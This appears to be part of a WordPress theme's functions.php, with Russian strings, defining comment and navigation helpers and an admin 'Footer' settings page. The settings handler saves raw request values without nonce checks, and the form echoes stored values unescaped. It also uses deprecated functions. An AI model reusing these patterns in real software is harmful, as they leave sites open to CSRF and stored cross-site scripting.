if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
